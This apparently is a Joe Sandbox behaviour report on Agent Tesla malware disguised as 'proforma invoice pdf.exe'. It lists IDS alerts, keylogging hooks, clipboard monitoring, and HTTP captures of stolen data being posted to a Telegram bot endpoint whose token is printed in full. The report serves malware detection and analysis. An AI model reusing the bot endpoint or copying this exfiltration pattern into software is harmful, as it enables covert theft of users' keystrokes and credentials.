Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49716
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49726
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49739 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49711
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49735 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49741 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49735 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49741 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fbeb6d69f3bHost: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fcf76777e6fHost: api.telegram.orgContent-Length: 4065Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fc184f85283Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fd50edc8fb4Host: api.telegram.orgContent-Length: 4065Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fc71fe14368Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fd944614e4eHost: api.telegram.orgContent-Length: 4065Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fb92eb8a9aeHost: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fcb53db4a08Host: api.telegram.orgContent-Length: 4065Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3690bd1eb7a0Host: api.telegram.orgContent-Length: 77700Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3b103c721cfeHost: api.telegram.orgContent-Length: 77480Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3fc8c9ea1cf4Host: api.telegram.orgContent-Length: 77480Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd431de51abaeaHost: api.telegram.orgContent-Length: 77464Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4549e7f1ca04Host: api.telegram.orgContent-Length: 77464Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd48c1ba4896daHost: api.telegram.orgContent-Length: 77464Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd52c0fe788e99Host: api.telegram.orgContent-Length: 77464Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd557f758a7aacHost: api.telegram.orgContent-Length: 77464Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd58c988529d68Host: api.telegram.orgContent-Length: 77464Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ccaf60e27aHost: api.telegram.orgContent-Length: 77464Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd687e284089f6Host: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5fa305630ac0Host: api.telegram.orgContent-Length: 77665Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5e9b104624c6Host: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63df8345268eHost: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89acf2feHost: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89af553cHost: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89c26833Host: api.telegram.orgContent-Length: 77457Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2fbeb6d69f3bHost: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive

Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003395000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: proforma invoice pdf.exe, bmBOz.exe.10.dr, wTyVrj.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: proforma invoice pdf.exe, bmBOz.exe.10.dr, wTyVrj.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: proforma invoice pdf.exe, bmBOz.exe.10.dr, wTyVrj.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: proforma invoice pdf.exe, 00000000.00000002.1479924222.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 0000000B.00000002.1531716100.0000000002378000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000011.00000002.1631976940.0000000002FD8000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000016.00000002.1695497323.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.000000000334A000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.000000000334A000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument
Source: proforma invoice pdf.exe, bmBOz.exe.10.dr, wTyVrj.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Code function: 25_2_06A38A88 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06A398B8,00000000,00000000

25_2_06A38A88

Installs a global keyboard hook

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\proforma invoice pdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wTyVrj.exe
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: proforma invoice pdf.exe

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_02C83E0C	0_2_02C83E0C
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_02C87018	0_2_02C87018
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0534C570	0_2_0534C570
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0534A820	0_2_0534A820
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0534A810	0_2_0534A810
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05357DF8	0_2_05357DF8
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05350040	0_2_05350040
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05350DFA	0_2_05350DFA
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05350E08	0_2_05350E08
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05357DEA	0_2_05357DEA
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0592B47C	0_2_0592B47C
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_059283C0	0_2_059283C0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0592ECB7	0_2_0592ECB7
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0592B4D0	0_2_0592B4D0
